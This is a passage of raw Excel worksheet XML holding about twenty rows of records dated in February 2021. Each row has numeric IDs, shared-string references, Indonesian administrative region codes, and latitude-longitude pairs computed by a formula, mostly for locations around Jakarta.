      <c r="I3545" t="s">
        <v>788</v>
      </c>
      <c r="J3545" t="s">
        <v>2608</v>
      </c>
      <c r="L3545" t="s">
        <v>11729</v>
      </c>
      <c r="M3545">
        <v>3326160014</v>
      </c>
      <c r="N3545">
        <v>3326160</v>
      </c>
      <c r="O3545">
        <v>3326</v>
      </c>
      <c r="P3545">
        <v>33</v>
      </c>
      <c r="Q3545" t="s">
        <v>11730</v>
      </c>
      <c r="R3545" t="s">
        <v>6245</v>
      </c>
      <c r="S3545" t="s">
        <v>6246</v>
      </c>
      <c r="T3545" t="s">
        <v>1134</v>
      </c>
      <c r="U3545" s="5">
        <v>10963418</v>
      </c>
      <c r="V3545" s="5" t="s">
        <v>17645</v>
      </c>
      <c r="W3545" s="5">
        <v>-688913</v>
      </c>
      <c r="X3545" t="s">
        <v>21380</v>
      </c>
      <c r="Y3545" t="str">
        <f t="shared" si="55"/>
        <v>-6.88913,109.63418</v>
      </c>
    </row>
    <row r="3546" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3546">
        <v>271288</v>
      </c>
      <c r="B3546" s="1">
        <v>44248</v>
      </c>
      <c r="C3546" s="2">
        <v>0.1277777777777778</v>
      </c>
      <c r="D3546" t="s">
        <v>2648</v>
      </c>
      <c r="E3546" t="s">
        <v>23</v>
      </c>
      <c r="G3546" t="s">
        <v>11731</v>
      </c>
      <c r="H3546" t="s">
        <v>26</v>
      </c>
      <c r="I3546" t="s">
        <v>103</v>
      </c>
      <c r="J3546" t="s">
        <v>644</v>
      </c>
      <c r="L3546" t="s">
        <v>11732</v>
      </c>
      <c r="M3546">
        <v>3174070002</v>
      </c>
      <c r="N3546">
        <v>3174070</v>
      </c>
      <c r="O3546">
        <v>3174</v>
      </c>
      <c r="P3546">
        <v>31</v>
      </c>
      <c r="Q3546" t="s">
        <v>621</v>
      </c>
      <c r="R3546" t="s">
        <v>84</v>
      </c>
      <c r="S3546" t="s">
        <v>32</v>
      </c>
      <c r="T3546" t="s">
        <v>33</v>
      </c>
      <c r="U3546" s="5">
        <v>10674644</v>
      </c>
      <c r="V3546" s="5" t="s">
        <v>17646</v>
      </c>
      <c r="W3546" s="5">
        <v>-616248</v>
      </c>
      <c r="X3546" t="s">
        <v>21381</v>
      </c>
      <c r="Y3546" t="str">
        <f t="shared" si="55"/>
        <v>-6.16248,106.74644</v>
      </c>
    </row>
    <row r="3547" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3547">
        <v>271508</v>
      </c>
      <c r="B3547" s="1">
        <v>44248</v>
      </c>
      <c r="C3547" s="2">
        <v>0.14385416666666667</v>
      </c>
      <c r="D3547" t="s">
        <v>22</v>
      </c>
      <c r="E3547" t="s">
        <v>23</v>
      </c>
      <c r="F3547" t="s">
        <v>11733</v>
      </c>
      <c r="G3547" t="s">
        <v>11734</v>
      </c>
      <c r="H3547" t="s">
        <v>26</v>
      </c>
      <c r="I3547" t="s">
        <v>1178</v>
      </c>
      <c r="J3547" t="s">
        <v>11572</v>
      </c>
      <c r="L3547" t="s">
        <v>11735</v>
      </c>
      <c r="M3547">
        <v>3171070002</v>
      </c>
      <c r="N3547">
        <v>3171070</v>
      </c>
      <c r="O3547">
        <v>3171</v>
      </c>
      <c r="P3547">
        <v>31</v>
      </c>
      <c r="Q3547" t="s">
        <v>2142</v>
      </c>
      <c r="R3547" t="s">
        <v>121</v>
      </c>
      <c r="S3547" t="s">
        <v>108</v>
      </c>
      <c r="T3547" t="s">
        <v>33</v>
      </c>
      <c r="U3547" s="5">
        <v>10681013</v>
      </c>
      <c r="V3547" s="5" t="s">
        <v>17402</v>
      </c>
      <c r="W3547" s="5">
        <v>-624991</v>
      </c>
      <c r="X3547" t="s">
        <v>21382</v>
      </c>
      <c r="Y3547" t="str">
        <f t="shared" si="55"/>
        <v>-6.24991,106.81013</v>
      </c>
    </row>
    <row r="3548" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3548">
        <v>271553</v>
      </c>
      <c r="B3548" s="1">
        <v>44248</v>
      </c>
      <c r="C3548" s="2">
        <v>0.14557870370370371</v>
      </c>
      <c r="D3548" t="s">
        <v>22</v>
      </c>
      <c r="E3548" t="s">
        <v>23</v>
      </c>
      <c r="F3548" t="s">
        <v>11736</v>
      </c>
      <c r="G3548" t="s">
        <v>11737</v>
      </c>
      <c r="H3548" t="s">
        <v>26</v>
      </c>
      <c r="I3548" t="s">
        <v>7595</v>
      </c>
      <c r="J3548" t="s">
        <v>2608</v>
      </c>
      <c r="L3548" t="s">
        <v>11738</v>
      </c>
      <c r="M3548">
        <v>3329110017</v>
      </c>
      <c r="N3548">
        <v>3329110</v>
      </c>
      <c r="O3548">
        <v>3329</v>
      </c>
      <c r="P3548">
        <v>33</v>
      </c>
      <c r="Q3548" t="s">
        <v>11739</v>
      </c>
      <c r="R3548" t="s">
        <v>6715</v>
      </c>
      <c r="S3548" t="s">
        <v>7301</v>
      </c>
      <c r="T3548" t="s">
        <v>1134</v>
      </c>
      <c r="U3548" s="5">
        <v>10886181</v>
      </c>
      <c r="V3548" s="5" t="s">
        <v>17647</v>
      </c>
      <c r="W3548" s="5">
        <v>-688424</v>
      </c>
      <c r="X3548" t="s">
        <v>21383</v>
      </c>
      <c r="Y3548" t="str">
        <f t="shared" si="55"/>
        <v>-6.88424,108.86181</v>
      </c>
    </row>
    <row r="3549" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3549">
        <v>271554</v>
      </c>
      <c r="B3549" s="1">
        <v>44248</v>
      </c>
      <c r="C3549" s="2">
        <v>0.14873842592592593</v>
      </c>
      <c r="D3549" t="s">
        <v>22</v>
      </c>
      <c r="E3549" t="s">
        <v>23</v>
      </c>
      <c r="F3549" t="s">
        <v>11740</v>
      </c>
      <c r="H3549" t="s">
        <v>26</v>
      </c>
      <c r="I3549" t="s">
        <v>5699</v>
      </c>
      <c r="J3549" t="s">
        <v>6668</v>
      </c>
      <c r="L3549" t="s">
        <v>11741</v>
      </c>
      <c r="M3549">
        <v>3174070001</v>
      </c>
      <c r="N3549">
        <v>3174070</v>
      </c>
      <c r="O3549">
        <v>3174</v>
      </c>
      <c r="P3549">
        <v>31</v>
      </c>
      <c r="Q3549" t="s">
        <v>83</v>
      </c>
      <c r="R3549" t="s">
        <v>84</v>
      </c>
      <c r="S3549" t="s">
        <v>32</v>
      </c>
      <c r="T3549" t="s">
        <v>33</v>
      </c>
      <c r="U3549" s="5">
        <v>10672748</v>
      </c>
      <c r="V3549" s="5" t="s">
        <v>17648</v>
      </c>
      <c r="W3549" s="5">
        <v>-616996</v>
      </c>
      <c r="X3549" t="s">
        <v>19302</v>
      </c>
      <c r="Y3549" t="str">
        <f t="shared" si="55"/>
        <v>-6.16996,106.72748</v>
      </c>
    </row>
    <row r="3550" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3550">
        <v>271856</v>
      </c>
      <c r="B3550" s="1">
        <v>44248</v>
      </c>
      <c r="C3550" s="2">
        <v>0.1706134259259259</v>
      </c>
      <c r="D3550" t="s">
        <v>22</v>
      </c>
      <c r="E3550" t="s">
        <v>23</v>
      </c>
      <c r="F3550" t="s">
        <v>11742</v>
      </c>
      <c r="H3550" t="s">
        <v>26</v>
      </c>
      <c r="I3550" t="s">
        <v>8140</v>
      </c>
      <c r="J3550" t="s">
        <v>2627</v>
      </c>
      <c r="L3550" t="s">
        <v>11743</v>
      </c>
      <c r="M3550">
        <v>3275031003</v>
      </c>
      <c r="N3550">
        <v>3275031</v>
      </c>
      <c r="O3550">
        <v>3275</v>
      </c>
      <c r="P3550">
        <v>32</v>
      </c>
      <c r="Q3550" t="s">
        <v>988</v>
      </c>
      <c r="R3550" t="s">
        <v>574</v>
      </c>
      <c r="S3550" t="s">
        <v>41</v>
      </c>
      <c r="T3550" t="s">
        <v>42</v>
      </c>
      <c r="U3550" s="5">
        <v>10702934</v>
      </c>
      <c r="V3550" s="5" t="s">
        <v>17649</v>
      </c>
      <c r="W3550" s="5">
        <v>-628165</v>
      </c>
      <c r="X3550" t="s">
        <v>21213</v>
      </c>
      <c r="Y3550" t="str">
        <f t="shared" si="55"/>
        <v>-6.28165,107.02934</v>
      </c>
    </row>
    <row r="3551" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3551">
        <v>271861</v>
      </c>
      <c r="B3551" s="1">
        <v>44248</v>
      </c>
      <c r="C3551" s="2">
        <v>0.16805555555555554</v>
      </c>
      <c r="D3551" t="s">
        <v>2648</v>
      </c>
      <c r="E3551" t="s">
        <v>23</v>
      </c>
      <c r="G3551" t="s">
        <v>11744</v>
      </c>
      <c r="H3551" t="s">
        <v>26</v>
      </c>
      <c r="J3551" t="s">
        <v>7794</v>
      </c>
      <c r="L3551" t="s">
        <v>11745</v>
      </c>
      <c r="M3551">
        <v>3172020001</v>
      </c>
      <c r="N3551">
        <v>3172020</v>
      </c>
      <c r="O3551">
        <v>3172</v>
      </c>
      <c r="P3551">
        <v>31</v>
      </c>
      <c r="Q3551" t="s">
        <v>7796</v>
      </c>
      <c r="R3551" t="s">
        <v>1644</v>
      </c>
      <c r="S3551" t="s">
        <v>49</v>
      </c>
      <c r="T3551" t="s">
        <v>33</v>
      </c>
      <c r="U3551" s="5">
        <v>10687338</v>
      </c>
      <c r="V3551" s="5" t="s">
        <v>15079</v>
      </c>
      <c r="W3551" s="5">
        <v>-635751</v>
      </c>
      <c r="X3551" t="s">
        <v>21384</v>
      </c>
      <c r="Y3551" t="str">
        <f t="shared" si="55"/>
        <v>-6.35751,106.87338</v>
      </c>
    </row>
    <row r="3552" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3552">
        <v>272352</v>
      </c>
      <c r="B3552" s="1">
        <v>44248</v>
      </c>
      <c r="C3552" s="2">
        <v>0.20898148148148146</v>
      </c>
      <c r="D3552" t="s">
        <v>22</v>
      </c>
      <c r="E3552" t="s">
        <v>23</v>
      </c>
      <c r="F3552" t="s">
        <v>11746</v>
      </c>
      <c r="G3552" t="s">
        <v>11747</v>
      </c>
      <c r="H3552" t="s">
        <v>26</v>
      </c>
      <c r="I3552" t="s">
        <v>11748</v>
      </c>
      <c r="J3552" t="s">
        <v>1656</v>
      </c>
      <c r="L3552" t="s">
        <v>11749</v>
      </c>
      <c r="M3552">
        <v>3173080003</v>
      </c>
      <c r="N3552">
        <v>3173080</v>
      </c>
      <c r="O3552">
        <v>3173</v>
      </c>
      <c r="P3552">
        <v>31</v>
      </c>
      <c r="Q3552" t="s">
        <v>157</v>
      </c>
      <c r="R3552" t="s">
        <v>157</v>
      </c>
      <c r="S3552" t="s">
        <v>62</v>
      </c>
      <c r="T3552" t="s">
        <v>33</v>
      </c>
      <c r="U3552" s="5">
        <v>10682908</v>
      </c>
      <c r="V3552" s="5" t="s">
        <v>17650</v>
      </c>
      <c r="W3552" s="5">
        <v>-617381</v>
      </c>
      <c r="X3552" t="s">
        <v>21385</v>
      </c>
      <c r="Y3552" t="str">
        <f t="shared" si="55"/>
        <v>-6.17381,106.82908</v>
      </c>
    </row>
    <row r="3553" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3553">
        <v>272356</v>
      </c>
      <c r="B3553" s="1">
        <v>44248</v>
      </c>
      <c r="C3553" s="2">
        <v>0.2076388888888889</v>
      </c>
      <c r="D3553" t="s">
        <v>2648</v>
      </c>
      <c r="E3553" t="s">
        <v>23</v>
      </c>
      <c r="G3553" t="s">
        <v>11750</v>
      </c>
      <c r="H3553" t="s">
        <v>26</v>
      </c>
      <c r="J3553" t="s">
        <v>2627</v>
      </c>
      <c r="L3553" t="s">
        <v>11751</v>
      </c>
      <c r="M3553">
        <v>3216081010</v>
      </c>
      <c r="N3553">
        <v>3216081</v>
      </c>
      <c r="O3553">
        <v>3216</v>
      </c>
      <c r="P3553">
        <v>32</v>
      </c>
      <c r="Q3553" t="s">
        <v>6132</v>
      </c>
      <c r="R3553" t="s">
        <v>2512</v>
      </c>
      <c r="S3553" t="s">
        <v>41</v>
      </c>
      <c r="T3553" t="s">
        <v>42</v>
      </c>
      <c r="U3553" s="5">
        <v>10707769</v>
      </c>
      <c r="V3553" s="5" t="s">
        <v>17651</v>
      </c>
      <c r="W3553" s="5">
        <v>-620242</v>
      </c>
      <c r="X3553" t="s">
        <v>21386</v>
      </c>
      <c r="Y3553" t="str">
        <f t="shared" si="55"/>
        <v>-6.20242,107.07769</v>
      </c>
    </row>
    <row r="3554" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3554">
        <v>272581</v>
      </c>
      <c r="B3554" s="1">
        <v>44248</v>
      </c>
      <c r="C3554" s="2">
        <v>0.22635416666666666</v>
      </c>
      <c r="D3554" t="s">
        <v>22</v>
      </c>
      <c r="E3554" t="s">
        <v>23</v>
      </c>
      <c r="F3554" t="s">
        <v>11752</v>
      </c>
      <c r="G3554" t="s">
        <v>11753</v>
      </c>
      <c r="H3554" t="s">
        <v>26</v>
      </c>
      <c r="I3554" t="s">
        <v>383</v>
      </c>
      <c r="J3554" t="s">
        <v>930</v>
      </c>
      <c r="L3554" t="s">
        <v>11754</v>
      </c>
      <c r="M3554">
        <v>3174070002</v>
      </c>
      <c r="N3554">
        <v>3174070</v>
      </c>
      <c r="O3554">
        <v>3174</v>
      </c>
      <c r="P3554">
        <v>31</v>
      </c>
      <c r="Q3554" t="s">
        <v>621</v>
      </c>
      <c r="R3554" t="s">
        <v>84</v>
      </c>
      <c r="S3554" t="s">
        <v>32</v>
      </c>
      <c r="T3554" t="s">
        <v>33</v>
      </c>
      <c r="U3554" s="5">
        <v>10673143</v>
      </c>
      <c r="V3554" s="5" t="s">
        <v>17652</v>
      </c>
      <c r="W3554" s="5">
        <v>-616291</v>
      </c>
      <c r="X3554" t="s">
        <v>21387</v>
      </c>
      <c r="Y3554" t="str">
        <f t="shared" si="55"/>
        <v>-6.16291,106.73143</v>
      </c>
    </row>
    <row r="3555" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3555">
        <v>272760</v>
      </c>
      <c r="B3555" s="1">
        <v>44248</v>
      </c>
      <c r="C3555" s="2">
        <v>0.23927083333333332</v>
      </c>
      <c r="D3555" t="s">
        <v>22</v>
      </c>
      <c r="E3555" t="s">
        <v>23</v>
      </c>
      <c r="F3555" t="s">
        <v>11755</v>
      </c>
      <c r="G3555" t="s">
        <v>11756</v>
      </c>
      <c r="H3555" t="s">
        <v>26</v>
      </c>
      <c r="I3555" t="s">
        <v>65</v>
      </c>
      <c r="J3555" t="s">
        <v>2777</v>
      </c>
      <c r="L3555" t="s">
        <v>11757</v>
      </c>
      <c r="M3555">
        <v>3171070002</v>
      </c>
      <c r="N3555">
        <v>3171070</v>
      </c>
      <c r="O3555">
        <v>3171</v>
      </c>
      <c r="P3555">
        <v>31</v>
      </c>
      <c r="Q3555" t="s">
        <v>2142</v>
      </c>
      <c r="R3555" t="s">
        <v>121</v>
      </c>
      <c r="S3555" t="s">
        <v>108</v>
      </c>
      <c r="T3555" t="s">
        <v>33</v>
      </c>
      <c r="U3555" s="5">
        <v>10682098</v>
      </c>
      <c r="V3555" s="5" t="s">
        <v>17653</v>
      </c>
      <c r="W3555" s="5">
        <v>-624793</v>
      </c>
      <c r="X3555" t="s">
        <v>21388</v>
      </c>
      <c r="Y3555" t="str">
        <f t="shared" si="55"/>
        <v>-6.24793,106.82098</v>
      </c>
    </row>
    <row r="3556" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3556">
        <v>272856</v>
      </c>
      <c r="B3556" s="1">
        <v>44248</v>
      </c>
      <c r="C3556" s="2">
        <v>0.24583333333333335</v>
      </c>
      <c r="D3556" t="s">
        <v>2648</v>
      </c>
      <c r="E3556" t="s">
        <v>23</v>
      </c>
      <c r="G3556" t="s">
        <v>11758</v>
      </c>
      <c r="H3556" t="s">
        <v>26</v>
      </c>
      <c r="J3556" t="s">
        <v>6668</v>
      </c>
      <c r="L3556" t="s">
        <v>11759</v>
      </c>
      <c r="M3556">
        <v>3174070001</v>
      </c>
      <c r="N3556">
        <v>3174070</v>
      </c>
      <c r="O3556">
        <v>3174</v>
      </c>
      <c r="P3556">
        <v>31</v>
      </c>
      <c r="Q3556" t="s">
        <v>83</v>
      </c>
      <c r="R3556" t="s">
        <v>84</v>
      </c>
      <c r="S3556" t="s">
        <v>32</v>
      </c>
      <c r="T3556" t="s">
        <v>33</v>
      </c>
      <c r="U3556" s="5">
        <v>10672127</v>
      </c>
      <c r="V3556" s="5" t="s">
        <v>15791</v>
      </c>
      <c r="W3556" s="5">
        <v>-618316</v>
      </c>
      <c r="X3556" t="s">
        <v>19799</v>
      </c>
      <c r="Y3556" t="str">
        <f t="shared" si="55"/>
        <v>-6.18316,106.72127</v>
      </c>
    </row>
    <row r="3557" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3557">
        <v>272896</v>
      </c>
      <c r="B3557" s="1">
        <v>44248</v>
      </c>
      <c r="C3557" s="2">
        <v>0.24861111111111112</v>
      </c>
      <c r="D3557" t="s">
        <v>2648</v>
      </c>
      <c r="E3557" t="s">
        <v>23</v>
      </c>
      <c r="G3557" t="s">
        <v>11760</v>
      </c>
      <c r="H3557" t="s">
        <v>26</v>
      </c>
      <c r="J3557" t="s">
        <v>6668</v>
      </c>
      <c r="L3557" t="s">
        <v>11761</v>
      </c>
      <c r="M3557">
        <v>3174070001</v>
      </c>
      <c r="N3557">
        <v>3174070</v>
      </c>
      <c r="O3557">
        <v>3174</v>
      </c>
      <c r="P3557">
        <v>31</v>
      </c>
      <c r="Q3557" t="s">
        <v>83</v>
      </c>
      <c r="R3557" t="s">
        <v>84</v>
      </c>
      <c r="S3557" t="s">
        <v>32</v>
      </c>
      <c r="T3557" t="s">
        <v>33</v>
      </c>
      <c r="U3557" s="5">
        <v>10672085</v>
      </c>
      <c r="V3557" s="5" t="s">
        <v>17654</v>
      </c>
      <c r="W3557" s="5">
        <v>-618311</v>
      </c>
      <c r="X3557" t="s">
        <v>21389</v>
      </c>
      <c r="Y3557" t="str">
        <f t="shared" si="55"/>
        <v>-6.18311,106.72085</v>
      </c>
    </row>
    <row r="3558" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3558">
        <v>272940</v>
      </c>
      <c r="B3558" s="1">
        <v>44248</v>
      </c>
      <c r="C3558" s="2">
        <v>0.25208333333333333</v>
      </c>
      <c r="D3558" t="s">
        <v>2648</v>
      </c>
      <c r="E3558" t="s">
        <v>23</v>
      </c>
      <c r="G3558" t="s">
        <v>11762</v>
      </c>
      <c r="H3558" t="s">
        <v>26</v>
      </c>
      <c r="J3558" t="s">
        <v>6668</v>
      </c>
      <c r="L3558" t="s">
        <v>11763</v>
      </c>
      <c r="M3558">
        <v>3174070001</v>
      </c>
      <c r="N3558">
        <v>3174070</v>
      </c>
      <c r="O3558">
        <v>3174</v>
      </c>
      <c r="P3558">
        <v>31</v>
      </c>
      <c r="Q3558" t="s">
        <v>83</v>
      </c>
      <c r="R3558" t="s">
        <v>84</v>
      </c>
      <c r="S3558" t="s">
        <v>32</v>
      </c>
      <c r="T3558" t="s">
        <v>33</v>
      </c>
      <c r="U3558" s="5">
        <v>10672079</v>
      </c>
      <c r="V3558" s="5" t="s">
        <v>17655</v>
      </c>
      <c r="W3558" s="5">
        <v>-618351</v>
      </c>
      <c r="X3558" t="s">
        <v>21390</v>
      </c>
      <c r="Y3558" t="str">
        <f t="shared" si="55"/>
        <v>-6.18351,106.72079</v>
      </c>
    </row>
    <row r="3559" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3559">
        <v>273382</v>
      </c>
      <c r="B3559" s="1">
        <v>44248</v>
      </c>
      <c r="C3559" s="2">
        <v>0.28611111111111115</v>
      </c>
      <c r="D3559" t="s">
        <v>22</v>
      </c>
      <c r="E3559" t="s">
        <v>23</v>
      </c>
      <c r="F3559" t="s">
        <v>11764</v>
      </c>
      <c r="G3559" t="s">
        <v>11765</v>
      </c>
      <c r="H3559" t="s">
        <v>26</v>
      </c>
      <c r="I3559" t="s">
        <v>628</v>
      </c>
      <c r="J3559" t="s">
        <v>9316</v>
      </c>
      <c r="M3559">
        <v>9420020002</v>
      </c>
      <c r="N3559">
        <v>9420020</v>
      </c>
      <c r="O3559">
        <v>9420</v>
      </c>
      <c r="P3559">
        <v>94</v>
      </c>
      <c r="Q3559" t="s">
        <v>11766</v>
      </c>
      <c r="R3559" t="s">
        <v>11766</v>
      </c>
      <c r="S3559" t="s">
        <v>11767</v>
      </c>
      <c r="T3559" t="s">
        <v>9321</v>
      </c>
      <c r="U3559" s="5">
        <v>14066402</v>
      </c>
      <c r="V3559" s="5" t="s">
        <v>17656</v>
      </c>
      <c r="W3559" s="5">
        <v>-332613</v>
      </c>
      <c r="X3559" t="s">
        <v>21391</v>
      </c>
      <c r="Y3559" t="str">
        <f t="shared" si="55"/>
        <v>-3.32613,140.66402</v>
      </c>
    </row>
    <row r="3560" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3560">
        <v>273589</v>
      </c>
      <c r="B3560" s="1">
        <v>44248</v>
      </c>
      <c r="C3560" s="2">
        <v>0.30346064814814816</v>
      </c>
      <c r="D3560" t="s">
        <v>22</v>
      </c>
      <c r="E3560" t="s">
        <v>23</v>
      </c>
      <c r="F3560" t="s">
        <v>11768</v>
      </c>
      <c r="H3560" t="s">
        <v>26</v>
      </c>
      <c r="I3560" t="s">
        <v>1477</v>
      </c>
      <c r="J3560" t="s">
        <v>3135</v>
      </c>
      <c r="L3560" t="s">
        <v>11769</v>
      </c>
      <c r="M3560">
        <v>3674040005</v>
      </c>
      <c r="N3560">
        <v>3674040</v>
      </c>
      <c r="O3560">
        <v>3674</v>
      </c>
      <c r="P3560">
        <v>36</v>
      </c>
      <c r="Q3560" t="s">
        <v>9716</v>
      </c>
      <c r="R3560" t="s">
        <v>229</v>
      </c>
      <c r="S3560" t="s">
        <v>170</v>
      </c>
      <c r="T3560" t="s">
        <v>171</v>
      </c>
      <c r="U3560" s="5">
        <v>10674145</v>
      </c>
      <c r="V3560" s="5" t="s">
        <v>17657</v>
      </c>
      <c r="W3560" s="5">
        <v>-629564</v>
      </c>
      <c r="X3560" t="s">
        <v>21392</v>
      </c>
      <c r="Y3560" t="str">
        <f t="shared" si="55"/>
        <v>-6.29564,106.74145</v>
      </c>
    </row>
    <row r="3561" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3561">
        <v>273631</v>
      </c>
      <c r="B3561" s="1">
        <v>44248</v>
      </c>
      <c r="C3561" s="2">
        <v>0.30973379629629633</v>
      </c>
      <c r="D3561" t="s">
        <v>22</v>
      </c>
      <c r="E3561" t="s">
        <v>23</v>
      </c>
      <c r="F3561" t="s">
        <v>11770</v>
      </c>
      <c r="G3561" t="s">
        <v>11771</v>
      </c>
      <c r="H3561" t="s">
        <v>26</v>
      </c>
      <c r="I3561" t="s">
        <v>555</v>
      </c>
      <c r="J3561" t="s">
        <v>675</v>
      </c>
      <c r="L3561" t="s">
        <v>11772</v>
      </c>
      <c r="M3561">
        <v>3174010006</v>
      </c>
      <c r="N3561">
        <v>3174010</v>
      </c>
      <c r="O3561">
        <v>3174</v>
      </c>
      <c r="P3561">
        <v>31</v>
      </c>
      <c r="Q3561" t="s">
        <v>268</v>
      </c>
      <c r="R3561" t="s">
        <v>69</v>
      </c>
      <c r="S3561" t="s">
        <v>32</v>
      </c>
      <c r="T3561" t="s">
        <v>33</v>
      </c>
      <c r="U3561" s="5">
        <v>10673350</v>
      </c>
      <c r="V3561" s="5" t="s">
        <v>17658</v>
      </c>
      <c r="W3561" s="5">
        <v>-618212</v>
      </c>
      <c r="X3561" t="s">
        <v>18317</v>
      </c>
      <c r="Y3561" t="str">
        <f t="shared" si="55"/>
        <v>-6.18212,106.73350</v>
      </c>
    </row>
    <row r="3562" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3562">
        <v>273714</v>
      </c>
      <c r="B3562" s="1">
        <v>44248</v>
      </c>
      <c r="C3562" s="2">
        <v>0.3143171296296296</v>
      </c>
      <c r="D3562" t="s">
        <v>22</v>
      </c>
      <c r="E3562" t="s">
        <v>23</v>
      </c>
      <c r="F3562" t="s">
        <v>11773</v>
      </c>
      <c r="H3562" t="s">
        <v>26</v>
      </c>
      <c r="I3562" t="s">
        <v>3616</v>
      </c>
      <c r="J3562" t="s">
        <v>2627</v>
      </c>
      <c r="L3562" t="s">
        <v>11774</v>
      </c>
      <c r="M3562">
        <v>3215031007</v>
      </c>
      <c r="N3562">
        <v>3215031</v>
      </c>
      <c r="O3562">
        <v>3215</v>
      </c>
      <c r="P3562">
        <v>32</v>
      </c>
      <c r="Q3562" t="s">
        <v>11775</v>
      </c>
      <c r="R3562" t="s">
        <v>11003</v>
      </c>
      <c r="S3562" t="s">
        <v>3979</v>
      </c>
      <c r="T3562" t="s">
        <v>42</v>
      </c>
      <c r="U3562" s="5">
        <v>10727615</v>
      </c>
      <c r="V3562" s="5" t="s">
        <v>17659</v>
      </c>
      <c r="W3562" s="5">
        <v>-631991</v>
      </c>
      <c r="X3562" t="s">
        <v>21393</v>
      </c>
      <c r="Y3562" t="str">
        <f t="shared" si="55"/>
        <v>-6.31991,107.27615</v>
      </c>
    </row>
    <row r="3563" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3563">
        <v>273756</v>
      </c>
      <c r="B3563" s="1">
        <v>44248</v>
      </c>
      <c r="C3563" s="2">
        <v>0.31875000000000003</v>
      </c>
      <c r="D3563" t="s">
        <v>2648</v>
      </c>
      <c r="E3563" t="s">
        <v>23</v>
      </c>
      <c r="G3563" t="s">
        <v>11776</v>
      </c>
      <c r="H3563" t="s">
        <v>26</v>
      </c>
      <c r="I3563" t="s">
        <v>103</v>
      </c>
      <c r="J3563" t="s">
        <v>266</v>
      </c>
      <c r="L3563" t="s">
        <v>11777</v>
      </c>
      <c r="M3563">
        <v>3174010006</v>
      </c>
      <c r="N3563">
        <v>3174010</v>
      </c>
      <c r="O3563">
        <v>3174</v>
      </c>
      <c r="P3563">
        <v>31</v>
      </c>
      <c r="Q3563" t="s">
        <v>268</v>
      </c>
      <c r="R3563" t="s">
        <v>69</v>
      </c>
      <c r="S3563" t="s">
        <v>32</v>
      </c>
      <c r="T3563" t="s">
        <v>33</v>
      </c>
      <c r="U3563" s="5">
        <v>10673840</v>
      </c>
      <c r="V3563" s="5" t="s">
        <v>15035</v>
      </c>
      <c r="W3563" s="5">
        <v>-618057</v>
      </c>
      <c r="X3563" t="s">
        <v>21394</v>
      </c>
      <c r="Y3563" t="str">
        <f t="shared" si="55"/>
        <v>-6.18057,106.73840</v>
      </c>
    </row>
    <row r="3564" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3564">
        <v>274826</v>
      </c>
      <c r="B3564" s="1">
        <v>44248</v>
      </c>
      <c r="C3564" s="2">
        <v>0.40840277777777773</v>
      </c>
      <c r="D3564" t="s">
        <v>22</v>
      </c>
      <c r="E3564" t="s">
        <v>23</v>
      </c>
      <c r="F3564" t="s">
        <v>11778</v>
      </c>
      <c r="G3564" t="s">
        <v>11779</v>
      </c>
      <c r="H3564" t="s">
        <v>26</v>
      </c>
      <c r="I3564" t="s">
        <v>11780</v>
      </c>
      <c r="J3564" t="s">
        <v>625</v>
      </c>
      <c r="L3564" t="s">
        <v>11781</v>
      </c>
      <c r="M3564">
        <v>3174070001</v>
      </c>
      <c r="N3564">
        <v>3174070</v>
      </c>
      <c r="O3564">
        <v>3174</v>
      </c>
      <c r="P3564">
        <v>31</v>
      </c>
      <c r="Q3564" t="s">
        <v>83</v>
      </c>
      <c r="R3564" t="s">
        <v>84</v>
      </c>
      <c r="S3564" t="s">
        <v>32</v>
      </c>
      <c r="T3564" t="s">
        <v>33</v>
      </c>
      <c r="U3564" s="5">
        <v>10671542</v>
      </c>
      <c r="V3564" s="5" t="s">
        <v>17660</v>
      </c>
      <c r="W3564" s="5">
        <v>-617815</v>
      </c>
      <c r="X3564" t="s">
        <v>21233</v>
      </c>
      <c r="Y3564" t="str">
        <f t="shared" si="55"/>
        <v>-6.17815,106.71542</v>
      </c>
    </row>
    <row r="3565" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3565">
        <v>275051</v>
      </c>
      <c r="B3565" s="1">
        <v>44248</v>
      </c>
      <c r="C3565" s="2">
        <v>0.43033564814814818</v>
      </c>
      <c r="D3565" t="s">
        <v>22</v>
      </c>
      <c r="E3565" t="s">
        <v>23</v>
      </c>
      <c r="F3565" t="s">
        <v>11782</v>
      </c>
      <c r="G3565" t="s">
        <v>11783</v>
      </c>
      <c r="H3565" t="s">
        <v>26</v>
      </c>
      <c r="I3565" t="s">
        <v>628</v>
      </c>
      <c r="J3565" t="s">
        <v>875</v>
      </c>
      <c r="M3565">
        <v>3174070002</v>
      </c>
      <c r="N3565">
        <v>3174070</v>
      </c>
      <c r="O3565">
        <v>3174</v>
      </c>
      <c r="P3565">
        <v>31</v>
      </c>
      <c r="Q3565" t="s">
        <v>621</v>
      </c>
      <c r="R3565" t="s">
        <v>84</v>
      </c>
      <c r="S3565" t="s">
        <v>32</v>
      </c>
      <c r="T3565" t="s">
        <v>33</v>
      </c>
      <c r="U3565" s="5">
        <v>10673349</v>
      </c>
      <c r="V3565" s="5" t="s">
        <v>17661</v>
      </c>
      <c r="W3565" s="5">
        <v>-616931</v>
      </c>
      <c r="X3565" t="s">
        <v>19585</v>
      </c>
      <c r="Y3565" t="str">
        <f t="shared" si="55"/>
        <v>-6.16931,106.73349</v>
      </c>
    </row>
    <row r="3566" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3566">
        <v>275160</v>
      </c>
      <c r="B3566" s="1">
        <v>44248</v>
      </c>
      <c r="C3566" s="2">
        <v>0.44070601851851854</v>
      </c>
      <c r="D3566" t="s">
        <v>22</v>
